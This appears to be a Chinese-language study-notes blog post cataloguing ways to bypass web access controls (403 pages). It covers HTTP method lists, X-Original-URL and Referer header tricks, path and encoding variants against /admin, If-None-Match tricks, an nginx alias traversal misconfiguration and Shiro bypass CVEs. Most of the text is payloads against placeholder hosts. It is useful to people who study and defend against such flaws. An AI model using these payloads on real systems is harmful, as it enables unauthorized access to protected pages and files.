学习笔记-绕过访问

绕过访问


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


相关文章

相关案例

相关工具

相关资源

Tips

  • protocol based bypass

    http://web.com/admin    # ===> 403
    https://web.com/admin   # ===> 200
    
  • method based bypass

    OPTIONS
    GET
    HEAD
    POST
    PUT
    DELETE
    TRACE
    TRACK
    CONNECT
    PROPFIND
    PROPPATCH
    MKCOL
    COPY
    MOVE
    LOCK
    UNLOCK
    VERSION-CONTROL
    REPORT
    CHECKOUT
    CHECKIN
    UNCHECKOUT
    MKWORKSPACE
    UPDATE
    LABEL
    MERGE
    BASELINE-CONTROL
    MKACTIVITY
    ORDERPATCH
    ACL
    PATCH
    SEARCH
    ARBITRARY
    
  • HTTP Header based bypass

    GET /admin HTTP/1.1
    Host: web.com   # ===> 403
    
    GET /anything HTTP/1.1
    Host: web.com
    X-Original-URL: /admin  # ===> 200
    
    GET /anything HTTP/1.1
    Host: web.com
    Referer: https://web.com/admin  # ===> 200
    
    GET https://qq.com HTTP/1.1
    Host: web.com   # ===> SSRF
    
  • url character/parameter bypass

    /admin/panel            # ===> 403
    /admin/monitor          # ===> 200
    
    /admin/monitor/;panel   # ===> 302
    
    web.com/admin           # ===> 403
    
    web.com/ADMIN           # ===> 200
    web.com/admin/          # ===> 200
    web.com//admin/         # ===> 200
    web.com/admin;          # ===> 200
    web.com/admin/.         # ===> 200
    web.com/admin/../admin  # ===> 200
    web.com/admin../admin   # ===> 200
    web.com/../admin        # ===> 200
    web.com//admin//        # ===> 200
    web.com/./admin/./      # ===> 200
    web.com/./admin/..      # ===> 200
    web.com/;/admin         # ===> 200
    web.com/.;/admin        # ===> 200
    web.com//;//admin       # ===> 200
    web.com/admin.json      # ===> 200(ruby)
    
    web.com/%2f/admin/      # ===> 200
    web.com/%2e/admin       # ===> 200
    web.com/%252e/admin     # ===> 200
    web.com/%ef%bc%8fadmin  # ===> 200
    
    web.com/admin           # ===> 302
    web.com/test/admin      # ===> 200
    web.com/admin..;/       # ===> 200
    
  • 304 bypass

    GET /admin HTTP/1.1
    Host: target.com
    If-None-Match: W/"123-dASdsa2d2212e4d21"
    
    GET /admin HTTP/1.1
    Host: target.com
    
    If-None-Match: W/"123-dASdsa2d2212e4d21"
    
    If-None-Match: W/"null"
    If-None-Match: W/"123-dASdsa2d2212e4d21" a
    

nginx

相关文章

root /var/www/html/public;

location /test/ {
    alias /var/www/html/public/;
}

✔  /test/public.html
❌  /test../private/secret.html
root /var/www/html/public;

location /test {
    alias /var/www/html/public/;
}

✔  /test/public.html
✔  /test../private/secret.html

Tomcat

相关文章


shiro

SHIRO-682 & CVE-2020-1957 | Shiro 权限绕过漏洞

SHIRO-782 & CVE-2020-11989

CVE-2020-17523

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

posted @ 2022-11-02 15:27  syscallwww  阅读(63)  评论(0编辑  收藏  举报